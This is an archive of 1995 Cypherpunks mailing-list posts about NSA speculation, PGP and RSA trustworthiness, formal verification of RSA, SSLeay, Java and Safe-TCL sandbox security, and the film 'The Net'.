"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Thu, 3 Aug 95 15:22:47 PDT
To: perry@piermont.com
Subject: Re: Did Clinton Authorize Electronic Warfare Against Davidians? (fwd)
In-Reply-To: <199508032014.QAA13009@panix4.panix.com>
Message-ID: <Pine.SUN.3.91.950803172414.6476G-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Perry E. Metzger wrote:

> 
> The Gate writes:
> > Does this belong?
> > 
> >                DID CLINTON AUTHORIZE ELECTRONIC WARFARE
> >                      AGAINST THE BRANCH DAVIDIANS?
> 
> No, it doesn't belong, and deliberately being a jerk by posting the
> whole thing with a "does this belong at the beginning" isn't a way to
> win friends and influence people.
> 
> I'm beginning to wonder if the conspiracy idiots on this list are here
> from the NSA to keep any real work getting done. Are there any
> cypherpunks left here, or is it all just cryptogroupies?
> 
> Some of us want to see cryptography deployed, not conspiracy theories
> about Waco, Vincent Foster, or your mother.
> 

Who told you about my mother ??

It is all lies ... my mother has never been to Waco
and I'm sure the NSA is involved in a misinformation campaign
and cover-up 8-)


.sig withheld to stump the aoler's.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 3 Aug 95 14:42:41 PDT
To: cypherpunks@toad.com
Subject: Re: "The Net"
Message-ID: <v02130504ac46ebb00ec5@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:30 8/2/95, Dr. Dimitri Vulis wrote:
>Not as good as Sneakers...

Which has the classic in-gag of the Hero and Villain sitting down on the
Villain's Cray (used to do code cracking presumably) with no indication
(except to those who recognize it as a Cray and get the gag) of its
significance or use.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Fri, 4 Aug 95 02:35:49 PDT
To: perry@piermont.com
Subject: Re: Noise: PBS under the Republicans (fwd)
In-Reply-To: <199508031636.MAA00571@panix4.panix.com>
Message-ID: <Pine.SOL.3.91.950803180422.29640D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 3 Aug 1995, Perry E. Metzger wrote:

> 
> What, exactly, does this have to do with cryptography?
> 
> .pm

If you have to ask, you can't afford it.

MacN




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 3 Aug 95 13:26:35 PDT
To: s5cromw@watson.ibm.com
Subject: Re: Object Oriented Crypto API
Message-ID: <9508031542.AA03277@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



Good idea.

I would have some suggestions, but first
an important question:

Is it to be discussed on the Cypherpunks list?

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 3 Aug 95 14:53:55 PDT
To: owner-cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <9508032153.AA23045@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> The emergence of NSA
>from absolutely secret agency to semi-public status (writing letters,
>P.R. concerns, opening a museum, etc.) at the same time as the general 
>availability of what's considered by many [including me] to be strong, 
>free, cryptography "for the masses" is interpreted by many [including me]
>as an implicit NSA comment on the availability of strong crypto in 
>general, and on the availability of PGP in particular.

Call me stupid, but what is the implicit comment?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 3 Aug 95 00:59:27 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <ac43be3d13021004ec3b@[205.199.118.202]>
Message-ID: <199508030758.RAA10894@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello Ray Cromwell <rjc@clark.net>, patl@lcs.mit.edu
  and tcmay@sensemedia.net (Timothy C. May)
  and cypherpunks@toad.com

> At 4:15 PM 8/1/95, Ray Cromwell wrote:
...
> >PGP, but in the algorithm itself. RSA-in-4-lines-perl is probably
>                                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >provably correct.  To guard against trapdoors in PGP, you should
>  ^^^^^^^^^^^^^^^^^
...
[emphasis tcmay]

To which tcmay responded:

> This doesn't seem likely. I mean, doesn't "RSA-in-4-lines-of-Perl" *of
> necessity* make use of external library/utility functions? Such as the "dc"
> math routines for the PRNG? Part of its compactness is that it makes use of
> available libraries.
...

AFAIK (my 4 lines might differ from yours), there is no PRNG in the
4 lines of perl. The key is supplied as a parameter, and no guidance
to its generation is given in the implementation.

You are right about the dc, but it only uses that for modular exponentiation,
which is a lot easier to prove correct than PRNG.
Which is not to say that it *has* been proven.


I guess that makes me a nit-picker...

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Date: Thu, 3 Aug 95 17:03:51 PDT
To: sunder@escape.com (Ray Arachelian)
Subject: Re: Noise: PBS under the Republicans (fwd)
In-Reply-To: <Pine.BSD/.3.91.950803121435.12078o-100000@escape.com>
Message-ID: <199508040003.SAA12916@bvsd.k12.co.us>
MIME-Version: 1.0
Content-Type: text/plain


> // Ray, you may want to forward this to the list.
> 
> A TYPICAL DAILY PBS SCHEDULE IF THE PUBLIC BROADCASTING LEADERS CAVE IN
> TO REPUBLICAN PRESSURE
> 
> 8:00 am  Morning Stretch:  Arnold Schwarzenegger does squats while
> reciting passages of "Atlas Shrugged."
[bs deleted]
> 
> 

Why am I seeing this with the cp list?



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 3 Aug 95 15:07:12 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <199508032204.SAA17985@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

On Thu, 3 Aug 1995, James Childers wrote:

>On Thu, 3 Aug 1995, Jim Ray wrote:
>
<snip>

>I'm afraid I don't follow. Are you saying that the NSA is assuming a more 
>public role because (apparently) stong crypto is now widely available to 
>the public?

yep. Sorry if I was unclear. Possibly even the recent Rosenburg
revelations are related, though they were reported in the media 
[in Miami at least] as coming from "the CIA" rather than from the
NSA. <sarcastic, unspoken, thoughts about "The Herald" here>

>I don't see the connection between A and B if this is what 
>you are claiming.

I do, but I am told I'm "paranoid." If I were running the NSA, I would
_NOT_ leave an obvious connection anyway, but those who know me say I'm
not exactly "NSA material."  ;-)

>
>Unless they're gearing up for a PR campaign...

Which is my theory. "They," for me, includes FBI director Freeh, whose
post OK City mass-murder paranoid anti-crypto comments I saw on C-SPAN. 
[Hence my PGP comment below.]

>I wonder how the NSA has 
>been portrayed in Hollywood in the past. I've just seen them mentioned in 
>one movie I can think about ("Crimson Tide"). Anyone else know of references?

Sorry, I'm almost movie-illiterate these days, but I do plan to see "the 
Net" soon,and I promise NOT to post my "review" unless I can add anything
meaningful to the previous ones, which is doubtful.<g>

>
>"Freedom is meaningless unless you can give to those with whom you 
>disagree." - Jefferson
<partial snip>
Agreed. "Liberty is like love, in that you can't have any until you give it
all away." [Unknown author, aprox. quote]
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMCE+5W1lp8bpvW01AQFV8QQAmW853KKBf9xba6B1/+reAAT1wu/UQD+f
ly8hNMen1NQWEERHJ5fyGOmC0oikJ3tepzh+5KLfegOTLqkZ8/omnYj2euKFNlVH
uSLs/f0PuLMWnPvpv/ntSVheJ8xA4u/PEz+WspLDKg7+nm/E4BP1Rb6PM79wsdKE
fb3wRuOcCmY=
=K5fD
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCFHgioZzwIn1bdtAQHcbwGAxhmZ8SCA9eF5WGGVNVOnudcqmkyHtrsn
inY/IoGrB8maPP4h/IdGzVrdddcOCkpH
=Gz8W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Thu, 3 Aug 95 16:42:11 PDT
To: danisch@ira.uka.de
Subject: Object Oriented Crypto API
In-Reply-To: <9508031542.AA03277@elysion.iaks.ira.uka.de>
Message-ID: <199508032337.AA13225@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Thu, 3 Aug 1995 17:42:29 +0200
   From: danisch@ira.uka.de (Hadmut Danisch)
   X-Sun-Charset: US-ASCII
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk


   Good idea.

   I would have some suggestions, but first
   an important question:

   Is it to be discussed on the Cypherpunks list?

   Hadmut

He's right. There's nothing about aliens, Waco, or Whitewater.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@jpunix.com>
Date: Thu, 3 Aug 95 16:50:53 PDT
To: cypherpunks@toad.com
Subject: the Mix-L mailing list
Message-ID: <199508032350.SAA02475@jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	I just discovered earlier this morning that in transitioning to a 
newer version of the FreeBSD OS, the majordomo code that runs the mix-l 
mailing list had become slightly broken. I'm not sure if subscription 
requests were being processed correctly. The list is fixed now. If you 
have tried to subscribe to mix-l in the past and have gotten no response, 
please try again.

send email to majordomo@jpunix.com with the BODY (not subject) of the 
message being:

subscribe mix-l

if you are interested in knowing about the goings-on with the development 
and operation of the Mixmaster remailer code.

- -- 
 John Perry - KG5RG - perry@jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMCFgvaghiWHnUu4JAQGijQf+LfBnZZh9SBNg+X16FFrqugMdoiTljXRV
09SQ5bzw31a6eZ3GMNhZpkCP4oYu/f6bYELJiWeAuBXc6BUGP8TsUDRR2ydYeZyv
Pl5u/JBmozu3KQx05b+E3RscQcVVqWxy2zZGNri0eA6yKt9yd3HvuCzBWIFQflov
/CkhA/Y3HalcNNc2jzQkdiwufSK8ke/N020su25UYg1foIeHL7Zc0mskHAILcsjl
7wwqmVxgbXabdAETCZF8Hhv2czVHF0GXkXKOukW79j10R5ny0cOXf1r8nwBTLzvO
XWjjcokOlYwrGIYtBAmtzbLbRy/VS9D7m56pqWb2y5nbBOV3E0Qp/w==
=HfwW
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 3 Aug 95 16:27:57 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <199508032325.TAA18780@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Rich Salz wrote:

<snip>


>Call me stupid, but what is the implicit comment?


I'm not sure, and I do not wish to speculate just now, with so many
people on this list who are so much better qualified to speculate
on the NSA's motivations than I am.

Perhaps my word "implicit" was poorly chosen. Anyway, going 
from silence to non-silence counts for _something_, and I doubt 
this kind of step was taken without high level thought or consul-
tation or infighting, considering the NSA's former near-monopoly on
strong cryptograpy capabilities.

<snip>

PS
I doubt *anyone* on this list is stupid, though all of us probably
do stupid things from time to time...  ;-)
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMCFYTm1lp8bpvW01AQGWYgP+NRdp4rfJ2PhFdiKQkOH1W9mV74l1Z7c9
hiPCLKbdkl8uq3lc53cS57wibF6XsuF2+cfcImsT2I0/C3jvijOgVOD917XJJrul
CbD9yEUuYL0DTeCc+pUSvdNiAsaKzXgaZE99d0tyHgo6Y3VTUMkP911kpyHrSCHF
aOWAJFTu+CM=
=XSiz
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCFayCoZzwIn1bdtAQHXjgGArZLvrCRLpWOGf9CEwPJw+599uR/1UTir
kZBwiMrsg724XmEgTnpZYD6bvISv8Fdw
=X31m
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Thu, 3 Aug 95 10:33:41 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto, dear Eliza dear Eliza...
Message-ID: <v01510102ac458ef5a964@[193.74.217.2]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>How do I know PGP IS secure? I don't. That doesn't mean I don't use it or

Doesn't the NSA certify the security of cryptosystems?
I wonder what they'd say about PGP?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMB/gUI4k1+54BopBAQEozAP/dTYfpk4aENquuhdmmAqWKFtHhcPFsj47
BL6F9QpA61eGaJ8T8hiuBlq9RBj8KYtQ0881CwLmiSztv1+uJxWWS11hb26l0zeD
tZ3I9JXgFJSC4Pkv2i84D5VbnFfL0W+7yWFsgJUgg++c9UUDVW7xcwSmUfVrqgE+
hVuFyCK/cDM=
=NXYL
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 3 Aug 95 17:53:53 PDT
To: cypherpunks@toad.com
Subject: Re: "The Net"
In-Reply-To: <Pine.BSD/.3.91.950803110646.12078E-100000@escape.com>
Message-ID: <9o809c19w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@escape.com> writes:

> On Wed, 2 Aug 1995, Dr. Dimitri Vulis wrote:
> > terrible. The star should NOT have appeared in a bikini. Yech.
>
> Why not, she had the right 'assets' for that scene, no? 8-D

Tastes vary. If she were my friend, I'd recommend stuffing that bra. :) :) :)
(With something steganographic, of course. :)

> > In a typical suspenseful scene (not a spoiler), the heroine sneaks into an
> > office and sets off a fire alarm. Everyone leaves, including a villaine, wh
> > doesn't log off.
>
> is this way.  Very few care about security.  Here at work I have to fight
> extra hard with idiots who log in and leave their machines -- users with
> Supervisory access!

I once was a consultant at a small financial services firm, and a (young,
disturbed) user was going around playing stupid pranks on unattended PCs. I
mandated the use of screenblankers that kicked in after 3 minutes of inactivity
and required a password to get back. The user would then reboot the PCs; some
password was needed to get onto the LAN, but he'd mess with the local
config.sys's. He eventually got fired and I do something else.

> > (One of the IP bytes was 344, by the way.)

> Re: ip #'s: Yeah, it's like all the phone numbers in every movie are
> 555-xxxx.  Probably they didn't want to get sued by posting a real net
> address and get sued.

I see! I remember reading that they discovered in the 30's that if they used a
real phone number in a movie, some people would actually dial it to see what it
is in real life, so all the phone numbers are in the nonexistent 555 exchange.
I guess if a valid IP number were used, some folks would ping it or something.
I guess byte values>255 are the IP equivalent of 555. Better than 127.0.0.1 -
someone might telnet to 127.0.0.1, then ask mgm/ua whose address this is. :)

> > "hot chats" on an her Mac, and hooks up the text to a voice synthesizer.
>
> can be telnetted into.  But the voice synths are possible.  Apple does
> provide that capability.  You'd have to get the irc client to use it.

My 6yr-old's IBM Aptiva comes with a sound board and the software that reads
English text and pronounces it in much more lifelike manner than the gizmo in
the movie. That gizmo sounded annoyingly computer-like, but had intonations
obviously coming from a human actor.

> it either.  It wasn't much of a "hot" chat.  It could have been much
> steamier.  The sex content of this movie was pretty lame though...

Hotter than any I've had in many, many years...
So, will they ever show some real X-rated hot chat in a real R-rated movie? :)

> > (If they all exchange so much e-mail, why do they bother FedExing diskettes
>
> More secure to fedex a disk.  Nobody on the net can read what's not on
> the net. ;-)  Now if the author of this movie knew about pgp... totally
> different story.

Better yet, if they were shown sending each other PGP-encrypted e-mail over the
Cypherpunks Anonymous Remailer Network... :) :) Maybe in the next movie.

> > (E-mailed from an open-access computer at a computer show, I might add)
>
> Not unlikely.  A lot of trade shows do provide machines with net access
> as demos of the internet.  Though it's usually manned by the ISP and not
> out in the open.

The notion is very realistic (but the flashy displays in the movie were not).
At the recent PC Expo at the Javitz Center in NYC, there were tens of PCs
running various Web browsers to try out. No one was watching over most of them.
I entered the URL telnet://uunet.uu.net:119, and sure enough, got connected.
It accepted 'IHAVE', but I was too lazy to type in an entire Usenet article.
I (and the heroine) could have telnetted to someone's port 25 just as easily.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Thu, 3 Aug 95 17:49:03 PDT
To: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: There's a hole in your crypto, dear Eliza dear Eliza...
In-Reply-To: <v01510102ac458ef5a964@[193.74.217.2]>
Message-ID: <m0seAr9-001f8YC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


Andrew Spring wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> >How do I know PGP IS secure? I don't. That doesn't mean I don't use it or
> 
> Doesn't the NSA certify the security of cryptosystems?
> I wonder what they'd say about PGP?

Hmm, I wonder if they have done such a certification and if an FOIA could 
elicit a response.



-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Thu, 3 Aug 95 17:54:03 PDT
To: trei@process.com
Subject: Re: a hole in PGP
In-Reply-To: <9508032026.AA16303@toad.com>
Message-ID: <m0seAwA-001f8aC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


Peter Trei wrote:

> What would you do if you could crack RSA?

> * Post the algorithm to the net [anonymously?].

I don't care about anonymous, I'd love to see RSA squirm and would want
them to know who did it.

> * Try to cut a deal with NSA

Nah, I want to see them scrambling to update thier crypto and leave us 
the hell alone. 


-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 3 Aug 95 20:45:35 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: a hole in PGP
Message-ID: <8AE74C9.00030002C3.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


DF> How is it "unscholarly, unprofessional, needlessly personal, and just
DF> plain insulting" to question the idea that hundreds of thousands of
DF> people are trusting their freedom to software that is probably not
                                                          ^^^^^^^^
  This is where you go too far. You have no basis for assigning such a
probability. While the incentives for releasing a crippled version are
there, the program has been subjected to intense scrutiny. As time goes
on, the failure to detect the kind of weaknesses you describe only
increases trust in the algorithms.

  But if you are paranoid, get a hold of one of the international
versions, use it to generate your keypairs, and then use MIT PGP to
encrypt and decrypt your communications. Nobody can know what version
you are using to make keys.

  Hell, if you are seriously paranoid, get the source code for key
generation, and compile your own stand-alone keymaker. Post it to some
.binaries thing via a remailer, and be happy that you foiled the
dastardly plot. And send a copy to me, while you're at it. With source.
I can compile my own from it that way.

  [Uh-oh. Sounds like "C'punks write code...."]



 * 
Everyone should have a cause.
I have a cause.
It's smut.








I'm for it
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick at Jihad <strick@yak.net>
Date: Thu, 3 Aug 95 15:42:08 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199508011956.MAA01495@comsec.com>
Message-ID: <199508032138.VAA00125@jihad.yak.net>
MIME-Version: 1.0
Content-Type: text


> But in which framework or language, given the profusion of frameworks and
> languages?
> 
> We had some TCL advocates a while back (Strick, Hal...)...any reaction to Java?

TCL solved my specific problem at that time.  Unfortunately I haven't
studied Java.  PM's comments (as usual) intrigue and bother me; I
need to study it.

TCL's biggest problem is that it's slow -- it's designed to be used
in the parts where speed doesn't really matter -- and it sounds
like java sovles that. 


Perry -- do you have the same basic objection to Safe-TCL that you do
do to Java?  I would think so.

 
			strick


> And so it goes.
> 
> --Tim May






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Thu, 3 Aug 95 19:52:43 PDT
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: "The Net"
In-Reply-To: <9o809c19w165w@bwalk.dm.com>
Message-ID: <WAA27310.199508040252@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9o809c19w165w@bwalk.dm.com>, Dr. Dimitri Vulis writes:
[...]
>The notion is very realistic (but the flashy displays in the movie were not).
>At the recent PC Expo at the Javitz Center in NYC, there were tens of PCs
>running various Web browsers to try out. No one was watching over most of them
>I entered the URL telnet://uunet.uu.net:119, and sure enough, got connected.
>It accepted 'IHAVE', but I was too lazy to type in an entire Usenet article.
>I (and the heroine) could have telnetted to someone's port 25 just as easily.

That's odd.  "uunet.uu.net" has had no A records for over a year.
Perhapse you mean "news.uu.net"?

At a recent the-net-is-hot-and-we-want-in show I appear to have
torqued off some sales drones 'cause I managed to get their Kosak-mode
web browser to give me a telnet.

They had left a "search the net" link on their pages (pointing to
Lycos or Info Seek - I don't remember which), and I used it to
locate one of my pages which has a "type the URL" field (it issues
a redirrect).

I guess they didn't realise that if they give you a "global" search
box you can get anywhere as long as you remember enough of the text
on the page...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 3 Aug 95 22:50:13 PDT
To: cypherpunks@toad.com
Subject: Re: "The Net"
In-Reply-To: <WAA27310.199508040252@garotte.va.pubnix.com>
Message-ID: <PFHa0c4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Josh M. Osborne" <stripes@va.pubnix.com> writes:
> That's odd.  "uunet.uu.net" has had no A records for over a year.
> Perhapse you mean "news.uu.net"?

Yes, sorry.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 3 Aug 95 20:43:05 PDT
To: tcmay@sensemedia.net
Subject: Re: Java, Netscape, OpenDoc, and Babel
Message-ID: <9508040342.AA23479@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Perry -- do you have the same basic objection to Safe-TCL that you do
>do to Java?  I would think so.

Safe-TCL comes from a different starting place.  For example, the original
intent was to actually remove all the dangerous operations such as
file manipulation.  As Perry's explained, this is different, and better,
then just having the run-time "guarantee" that all file I/O is in a
"Safe" place.

Claimer:  I invented safe-tcl, started by creating a mailing list with
Ousterhout and Borenstein.  Disclaimer:  I walked away in disgust with
the announcement of "enabled mail" so they may have broken things.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 3 Aug 95 23:40:51 PDT
To: cypherpunks@toad.com
Subject: RSA has been proved correct
Message-ID: <ac470d240502100447cc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Serendipity strikes.

I was reading the logic programming/theorem proving chapter of my new
Russell and Norvig book on AI, and came across something I once knew about
but had forgotten: the Boyer-Moore theorem prover was applied to the RSA
algorithm and the correctness of it was verified. Correctness in the sense
of showing that outputs match formal specs, for all inputs.

The paper is: Boyer, R.S and Moore, J.S. (1984). Proof checking the RSA
public key encryption algorithm, "American Mathematical Monthly,"
91(3):181-189.

Now this does not mean:

- that implementations cannot have flaws, backdoors, etc.

- that larger systems which use RSA cannot have flaws, backdoors, etc.

What it says is that there is hope that formal verification of critical
modules is possible.

I can't imagine too many areas of software engineering that are more
critical to modularize and verify than crypto and digital money sorts of
things.

Huge monolithic programs are vastly more difficult--probably
intractable--to verify.

The "crypto library" project(s)--I use the plural because there have been
several such projects--are good ideas. Small modules that do one thing and
one thing only are best for building larger modules robustly.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Thu, 3 Aug 95 21:55:54 PDT
To: enzo@ima.com (Enzo Michelangeli)
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <Pine.LNX.3.91.950804104356.9665A-100000@ima.net>
Message-ID: <199508040455.AAA18486@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu Aug  3 23:45:04 1995: you scribbled...
> 
> On Thu, 3 Aug 1995, Jason Weisberger wrote:
> 
> > Maybe I miss it, but when did this arrive?  Is anyone testing it?
> 
> You may take a look at http://www.psy.uq.oz.au/~ftp/Crypto/
> 
> My initial enthusiasm has somewhat vanished when I've realized that a 
> free SSL implementation doesn't automatically allow to build a 
> Netsite-compatible server: without a certificate issued by Verisign on 
> behalf of Netscape Communications, Netscape Navigator won't talk to it.
> As SSL has some intrinsic points of weakness, I don't see the point
> of sticking to it to secure the TCP layer.

just wondering but...What are the intrinsic points of weakness?  

...alex...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 3 Aug 95 22:17:39 PDT
To: rsalz@osf.org (Rich Salz)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9508040342.AA23479@sulphur.osf.org>
Message-ID: <199508040517.BAA05467@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >Perry -- do you have the same basic objection to Safe-TCL that you do
> >do to Java?  I would think so.
> 
> Safe-TCL comes from a different starting place.  For example, the original
> intent was to actually remove all the dangerous operations such as
> file manipulation.  As Perry's explained, this is different, and better,
> then just having the run-time "guarantee" that all file I/O is in a
> "Safe" place.

  Uh, no. There is no difference between this and Java. File I/O
operations can be added to any Safe-TCL restricted interpreter
via "declareharmless". The trusted and untrusted interpreters
don't run in separate process spaces, nor is it chrooted(). Perry's
criteria is that a failure can not result in the interpreter gaining
priveleges it doesn't have. In Safe-TCL this is possible because there
is no protection between the trusted and untrusted interpreters. It's
possible that a bug could cause the interpreter to use an operating
system privelege the model clearly wasn't supposed to have.
(e.g., what if, by chance, the restricted and unresstricted interpreter
pointers get swapped or given to a function in reverse argument order
within an application? Kaboom, the safe-tcl script executes with full
priveleges)

  This is much less secure than Java. First of all, there is no
"declareharmless" in Java. The only way to access any low-level
I/O in Java is via a class interface, and the "final" keyword on
the Java i/o classes prevent any subclasses from overriding these
methods. You can not tell the Java runtime to add a new privelege
to the interpreter like in Safe-TCL. The only way to extend Java is to
create "native" C-code methods and link them in.

  Java relies on its class loader and byte-code verifier to make sure
unauthorized code is attempting execution (such as overriding a system
method)

  It's not as secure as chroot() the Java runtime and running it in a 
separate process with only a pipe to communicate with the outside
O/S, but I feel it is a lot safer than Safe-Tcl. (not to denigrate
Safe-TCL, I am using it in a large project, but this is MHO)


  Finally, all you have to do to remove all I/O ability from Java is delete
the File I/O classes from the class hierarchy on your disk where HotJava
runs. Most apps don't use any File I/O anyway. (Java forces file i/o to
only be allowed in ~/.hotjava or wherever an environment variable
points) Java has no built in I/O primitives in the language itself.

-Ray



 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
